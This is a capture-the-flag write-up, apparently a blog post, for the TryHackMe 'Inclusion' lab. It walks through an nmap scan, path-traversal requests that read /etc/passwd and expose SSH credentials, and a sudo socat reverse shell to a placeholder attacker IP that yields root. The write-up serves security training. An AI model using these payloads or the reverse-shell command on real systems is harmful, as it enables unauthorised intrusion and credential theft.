TryHackMe: Inclusion — Write-Up

Hi,

This article is about Inclusion capture the flag falconfeast created by on TryHackMe.

Description: A beginner level LFI challenge

This challenge teach us how we can find and exploit LFI (Local File Inclusion) vulnerability on any web application. Let’s get started,

First deploy the machine using “Deploy” button so that I become accessible for us as shown in figure 1.1 below:

Now after deploying we will get IP of the machine as shown in figure 1.2 below:

Now let’s scan this ip with nmap as shown in figure 1.4 below:

nmap -sV 10.10.68.223

From above results we came to know that there are 2 ports running and they are:

  1. 22 (SSH) (OpenSSH)
  2. 80 (HTTP) (Werkzeug Httpd)

Now let’s access this IP from web browser and let’s see what we can get. Result shown in figure 1.5 below:

Let’s explore the pages of this web app. As the Room name is Inclusion so we start with exploration from “LFI-attack” page. Response is shown in figure 1.6 below:

And here we have find a place from where we check about LFI vulnerability as shown in figure 1.7 below:

Change the value in name parameter from “lfiattack” with “/etc/passwd” and keep changing untill you get a different output.

10.10.68.223/article?name=/etc/passwd

10.10.68.223/article?name=../etc/passwd

10.10.68.223/article?name=../../etc/passwd

10.10.68.223/article?name=../../etc/passwd

10.10.68.223/article?name=../../../etc/passwd

I was keep trying till the last request showed me different result which is shown in figure 1.8 below:

This shows the LFI is possible on this web app but as I was carefully reading the output, the username and password of ssh as shown in figure below:

Now let’s try to connect with this machine using ssh with credentials we got from web app.

ssh falconfeast@10.10.68.223

Here we go we have now ssh connected with those credentials. SSH connection shown in figure 1.11 below:

explore this directory to find any useful content with given command:

ls -al

We have successfully found user.txt user flag as shown in figure 1.12 below:

In order to get root.txt we have to get either root user or privileges of root user. To check privileges of current user enter following command sh shown in figure 1.13 below:

sudo -l

We came to know that with we can run socat with root privileges on falconfeast user. A brief introduction to socat. So cat is Socket cat Command Line Tool like netcat and more secure. It transfered the data between 2 locations. In order to establish connection first we have to run listener command and then connection command. Command for listening will be run on Attacking machine while command for connection will be run on victim machine.

socat file: `tty`,raw,echo=0 tcp-listen:9999

Above command will run on attacker machine as shown in figure 1.14 below:

sudo socat tcp-connect:<Attacker_Machine_IP>:9999 exec:bash,pty,stderr,setsid,sigint,sane

Above written is single command as it will run on victim’s machine as shown in figure 1.15 below:

As you run above command you will get root user connection on listening terminal as shown in figure 1.16 below:

As we have got the root access now go to root directory and read the flag with cat command ash shown in figure 1.17 below:

Hurrah! We have completed this Inclusion Challenge. Thanks for being staying till here.

If you like this article, then please support on Patreon. So that I keep writing articles like these.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store